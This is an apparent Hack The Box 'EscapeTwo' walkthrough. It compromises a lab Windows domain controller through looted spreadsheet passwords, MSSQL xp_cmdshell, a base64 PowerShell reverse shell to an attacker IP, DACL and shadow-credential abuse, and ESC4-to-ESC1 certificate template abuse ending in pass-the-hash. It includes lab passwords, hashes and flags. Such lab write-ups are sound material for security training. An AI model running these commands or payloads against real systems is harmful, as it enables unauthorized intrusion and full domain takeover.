EscapeTwo

REHAN SAYYED

Machine Information

As is common in real-life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

IP: 10.129.145.201

Let’s start with an Nmap scan of the default ports:

nmap -sC -sV -oN nmap 10.129.145.201
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-15 00:18 EST
Nmap scan report for 10.129.145.201
Host is up (0.29s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-15 05:18:40Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-15T05:20:04+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-15T05:20:03+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.129.145.201:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-02-15T05:14:28
|_Not valid after:  2055-02-15T05:14:28
| ms-sql-ntlm-info: 
|   10.129.145.201:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-02-15T05:20:04+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-15T05:20:04+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-15T05:20:03+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-02-15T05:19:24
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.79 seconds

The host is a Windows Domain Controller: Kerberos (88), LDAP (389/636/3268/3269), DNS (53), SMB (445) and WinRM (5985) are all open, and the LDAP banner gives us the domain name sequel.htb and the hostname DC01. Microsoft SQL Server 2019 is also listening on port 1433, which is unusual on a DC and worth remembering. One more detail in the LDAP certificates: the Subject Alternative Name carries the othername OID 1.3.6.1.4.1.311.25.1, which is Microsoft’s SID security extension stamped into certificates issued by an AD CS enterprise CA, so there is an Active Directory Certificate Services deployment in this domain. Let’s map the name to the IP in our hosts file (an entry for 10.129.145.201 covering both sequel.htb and DC01.sequel.htb):

sudo nano /etc/hosts

Since we were given valid credentials and SMB is open, let’s enumerate shares with them.

smbmap -H sequel.htb -u rose -p 'KxEPkKe6R8su'

Besides the default shares there is an "Accounting Department" share that looks interesting. Let’s connect to it with smbclient and have a look.

smbclient //sequel.htb/Accounting\ Department  -U rose

The share holds two Excel files. Let’s pull both down (run prompt first, or answer y to each file) and see whether they contain anything useful.

mget *.xlsx

Checking the file type:

file accounting_2024.xlsx

An .xlsx file is an Office Open XML document, i.e. a zip archive of XML parts, so we do not need Excel to read it. Unpack each workbook into its own directory so the xl/ trees do not overwrite each other:

unzip accounting_2024.xlsx -d accounting_2024

unzip accounts.xlsx -d accounts

That produces a lot of files. Let’s analyse them one by one.

The cell text of a workbook is stored in the shared-string table, xl/sharedStrings.xml. In accounts/xl/sharedStrings.xml we find a list of users and their passwords. One of them is "sa", the built-in SQL Server sysadmin login, which is a SQL authentication account rather than a domain account. The MSSQL port is open, so let’s first check whether the credential is valid (--local-auth tells nxc to use SQL authentication instead of Windows authentication):
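To show how little is needed to pull the strings out of a workbook, here is an added Python helper (not part of the write-up) that opens an .xlsx as a zip and dumps xl/sharedStrings.xml. Rich-text cells split one value across several <r><t> runs, so the helper joins all <t> children of each <si>. The sample workbook it builds is constructed inline with placeholder values, not the data from the box; point it at a real file by passing the path on the command line.

```python
"""Dump the shared-string table of an .xlsx without Excel (added example)."""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET

# Namespace of the SpreadsheetML main schema used by xl/sharedStrings.xml.
SST_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"


def shared_strings(xlsx_bytes: bytes) -> list:
    """Return every entry of the workbook's shared-string table, in order."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        if "xl/sharedStrings.xml" not in zf.namelist():
            return []  # workbook with no text cells at all
        root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    out = []
    for si in root.iter(f"{{{SST_NS}}}si"):
        # Join all <t> runs so a rich-text cell comes back as one string.
        out.append("".join(t.text or "" for t in si.iter(f"{{{SST_NS}}}t")))
    return out


def build_sample_xlsx() -> bytes:
    """Construct a minimal xlsx in memory. Values are placeholders (constructed)."""
    sst = (
        f'<sst xmlns="{SST_NS}" count="6" uniqueCount="6">'
        "<si><t>Username</t></si><si><t>Password</t></si>"
        "<si><t>sa</t></si>"
        "<si><r><t>Pass</t></r><r><t>word1!</t></r></si>"  # rich-text cell
        "<si><t>svc_app</t></si><si><t>Winter2024</t></si>"
        "</sst>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")  # placeholder part
        zf.writestr("xl/sharedStrings.xml", sst)
    return buf.getvalue()


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_xlsx()
    for idx, value in enumerate(shared_strings(data)):
        print(f"{idx:4d}: {value}")
```

Shared strings are stored once per distinct value and referenced by index from the sheets, so the order above is insertion order, not cell order; for credential hunting that is usually enough, and the same approach works for .docx and .pptx parts.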

nxc mssql sequel.htb -u sa -p 'MSSQLP@ssw0rd!' --local-auth

And the creds are valid. Let’s now use mssqlclient.py and get into the system.

impacket-mssqlclient sequel.htb/sa:'MSSQLP@ssw0rd!'@sequel.htb

Because sa holds the sysadmin role we can enable xp_cmdshell and execute OS commands directly. The option is hidden behind 'show advanced options', so a bare EXEC sp_configure 'xp_cmdshell', 1 fails until that is switched on; the full sequence is:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';

(impacket-mssqlclient also ships an enable_xp_cmdshell helper that runs exactly these statements.) The last query should now show run_value 1. Let’s test it:

EXEC xp_cmdshell 'whoami';

Let’s turn this into a proper reverse shell.

Start the listener on our machine first (the rlwrap nc command below), then run a PowerShell TCP reverse shell through xp_cmdshell. powershell -e expects the script base64-encoded as UTF-16LE, which is why the blob is so long; decoding it shows it connects back to 10.10.14.69 on port 6658, so replace those with your own listener address and port before use.

xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgA5ACIALAA2ADYANQA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='

Now check the Netcat listener; the shell arrives in the context of the SQL Server service account.

rlwrap nc -nlvp 6658

Let’s enumerate the machine from this shell.

C:\Users contains an account we have not seen yet, Ryan, but we cannot read anything in his profile.

The sql_svc profile is empty of anything useful as well. Let’s go back up and look at the directory the shell started in, since SQL Server installations tend to leave setup artefacts behind.

There we find a file named sql-configuration.INI, the unattended-setup answer file. Let’s print it, because these files often carry service account passwords in clear text:

type sql-configuration.INI

It contains the password of the SQL service account: WqSZAF6CysDQbGb3. What we really want is access as Ryan, though. We now hold several passwords (the spreadsheet entries, rose’s, and this one), so let’s put them in a list and try each against ryan over WinRM. Password reuse between service and user accounts is common enough that this is always worth a try.

cat pass.txt

nxc winrm sequel.htb -u ryan -p pass.txt

The sql_svc password is also Ryan’s password. Let’s log in over WinRM:

evil-winrm -i sequel.htb -u ryan -p WqSZAF6CysDQbGb3

Let’s now grab our first flag.

type user.txt

Flag: ae106e1d082487fc07aaed597bad9f98

Now for root. Given the AD CS hints from the nmap output, let’s first check for vulnerable certificate templates. Certify.exe can be uploaded through evil-winrm and run on the host:

upload certify.exe

But certipy-ad from our own machine gives the same view without dropping a binary on the target, so let’s use that instead:

certipy-ad find -vulnerable -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 10.129.145.201 -stdout

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC01-CA
    DNS Name                            : DC01.sequel.htb
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00
    Certificate Validity End            : 2124-06-08 17:00:40+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates                   : [!] Could not find any certificate templates

Nothing exploitable from ryan’s position: the CA exists and Authenticated Users can enroll, but none of the templates ryan can see is flagged as vulnerable. That only rules out the templates reachable with ryan’s rights, so let’s look at the domain for a path to a more privileged account.

Let’s now map the domain using Bloodhound.

bloodhound-python -u ryan -p "WqSZAF6CysDQbGb3" -d sequel.htb -ns 10.129.145.201 -c All

Now let's compress our JSON file into a zip and then let's use Bloodhound to see the data.

mv *.json /home/kali/HTB/boxes/escapetwo/bloodhound

zip -r bloodhound.zip bloodhound

sudo neo4j start

bloodhound

Let’s import our zip file now.

Let’s first mark the user as owned and set it as a starting node.

Looking at the user’s outbound object control, we see that ryan has WriteOwner on the CA_SVC user.

WriteOwner lets ryan take ownership of the ca_svc object. Ownership alone grants no rights on the attributes, but the owner may always rewrite the object’s DACL, so the chain is: take ownership, grant ourselves full control, then abuse that control to authenticate as ca_svc. Let’s first look at the account.

net user ca_svc /domain

ca_svc is a member of the Cert Publishers group, which is significant because AD CS grants that group write access on certificate templates. Let’s take ownership of the account:

bloodyAD --host 'DC01.sequel.htb' -d 'sequel.htb' -u 'ryan' -p 'WqSZAF6CysDQbGb3' set owner 'ca_svc' 'ryan'

As the owner, ryan can now edit the DACL. Let’s grant ryan FullControl (GenericAll) over ca_svc so we can modify its attributes:

impacket-dacledit  -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"

With GenericAll we can write msDS-KeyCredentialLink, which enables a shadow credentials attack. certipy-ad’s shadow auto does the whole thing: it adds a key credential to ca_svc, authenticates with it via PKINIT, recovers the account’s NT hash with a U2U ticket request, and then removes the key credential again.

certipy-ad shadow auto -u 'ryan@sequel.htb' -p "WqSZAF6CysDQbGb3" -account 'ca_svc' -dc-ip '10.129.145.201' -target dc01.sequel.htb

That gives us the NT hash of ca_svc.
With that hash we can authenticate as ca_svc and enumerate AD CS again from the viewpoint of a Cert Publishers member.

certipy-ad find -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -stdout -vulnerable

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC01-CA
    DNS Name                            : DC01.sequel.htb
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00
    Certificate Validity End            : 2124-06-08 17:00:40+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions

There are several AD CS escalation techniques, all described in detail in SpecterOps’ "Certified Pre-Owned" whitepaper. Here certipy reports ESC4: a principal we control (ca_svc, through Cert Publishers) has write access to the template object itself. Write access to a template means we can rewrite its settings into a configuration that is vulnerable to ESC1 and then enroll for a certificate in any name we like. We need the CA name and the template name.

Let’s overwrite the template configuration to make it vulnerable to ESC1 (ESC4 -> ESC1). -save-old writes the current configuration to a JSON file so the template can be restored afterwards with the template command’s -configuration option; do that on a real engagement.

certipy-ad template -u ca_svc -target sequel.htb -template DunderMifflinAuthentication -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -save-old

The template is now vulnerable to ESC1. ESC1 applies when a template permits client authentication, lets the enrollee supply the subject and SAN, requires neither manager approval nor authorized signatures, and can be enrolled by a low-privileged principal. Request a certificate from the rewritten template with the Administrator UPN in the SAN.
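To make concrete what the ESC4 rewrite changes, here is an added Python check (not part of the write-up and not certipy’s code) that evaluates the ESC1 preconditions from a template’s LDAP attributes. The flag constants are the documented msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag bit values; the "before" state is taken from the certipy output above, and the "after" state is an assumed permissive configuration of the kind the template command writes (enrollee supplies subject, no approval, Authenticated Users may enroll), which you should confirm by re-running certipy-ad find -vulnerable as ca_svc.

```python
"""Evaluate ESC1 preconditions from a certificate template's attributes (added example)."""
from dataclasses import dataclass, field

# msPKI-Certificate-Name-Flag bits
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_SUBJECT_ALT_REQUIRE_DNS = 0x00400000
CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME = 0x40000000
# msPKI-Enrollment-Flag bits
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002   # shown by certipy as "Requires Manager Approval"
CT_FLAG_PUBLISH_TO_DS = 0x00000008
CT_FLAG_AUTO_ENROLLMENT = 0x00000020

# EKU OIDs that make a certificate usable for domain authentication.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
SERVER_AUTH_EKU = "1.3.6.1.5.5.7.3.1"
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


@dataclass
class Template:
    name: str
    name_flag: int                                     # msPKI-Certificate-Name-Flag
    enrollment_flag: int                               # msPKI-Enrollment-Flag
    ra_signatures: int                                 # msPKI-RA-Signature
    ekus: set = field(default_factory=set)             # pKIExtendedKeyUsage OIDs
    enroll_rights: set = field(default_factory=set)    # principals holding Enroll


def esc1_conditions(t: Template) -> dict:
    """Each ESC1 precondition, True when the template satisfies it."""
    return {
        "low_priv_can_enroll": bool(t.enroll_rights & LOW_PRIV_PRINCIPALS),
        "enrollee_supplies_subject": bool(t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no_manager_approval": not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no_signatures_required": t.ra_signatures == 0,
        # An empty EKU list means "no restriction", which also allows authentication.
        "client_auth_eku": (not t.ekus) or bool(t.ekus & CLIENT_AUTH_EKUS),
    }


def is_esc1(t: Template) -> bool:
    return all(esc1_conditions(t).values())


def missing_for_esc1(t: Template) -> list:
    """Sorted names of the preconditions that still block ESC1."""
    return sorted(k for k, v in esc1_conditions(t).items() if not v)


# Before: DunderMifflinAuthentication exactly as certipy printed it above.
BEFORE = Template(
    "DunderMifflinAuthentication",
    name_flag=CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME | CT_FLAG_SUBJECT_ALT_REQUIRE_DNS,
    enrollment_flag=CT_FLAG_AUTO_ENROLLMENT | CT_FLAG_PUBLISH_TO_DS,
    ra_signatures=0,
    ekus={"1.3.6.1.5.5.7.3.2", SERVER_AUTH_EKU},
    enroll_rights={"Domain Admins", "Enterprise Admins"},
)

# After: assumed result of the ESC4 rewrite (permissive config, modelled here).
AFTER = Template(
    "DunderMifflinAuthentication",
    name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    enrollment_flag=0,
    ra_signatures=0,
    ekus={"1.3.6.1.5.5.7.3.2"},
    enroll_rights={"Authenticated Users"},
)

if __name__ == "__main__":
    for label, tpl in (("before", BEFORE), ("after", AFTER)):
        print(f"{label}: ESC1={is_esc1(tpl)} missing={missing_for_esc1(tpl)}")
```

Two of the five conditions fail on the original template (only Domain Admins and Enterprise Admins may enroll, and the subject is built from the AD object rather than supplied by the requester); those are precisely the settings ESC4 lets us change. The same check, fed from an LDAP dump, is a reasonable blue-team audit for templates that drift into an ESC1 state.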

certipy-ad req -u 'ca_svc@sequel.htb' -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb

Now, let’s get the administrator hash.

certipy-ad auth -pfx administrator.pfx -username Administrator -domain sequel.htb

certipy-ad auth authenticates to the KDC with the certificate (PKINIT) and then recovers the NT hash through a U2U ticket request. We now have the administrator’s NT hash; let’s use it for pass-the-hash over WinRM.

evil-winrm -i 10.129.145.201 -u administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff

Let’s now get our Root flag.

type root.txt

Flag: 190e46419a3281df92d83e7f12d8ece3

Written by

REHAN SAYYED

Passionate cybersecurity enthusiast and red teamer, exploring the depths of offensive security. From secure code reviews to red team operations, I share insights, strategies, and hands-on experiences to help others dive into the world of cyber offense. Join me as I navigate the complexities of cybersecurity on my journey to professional red teaming.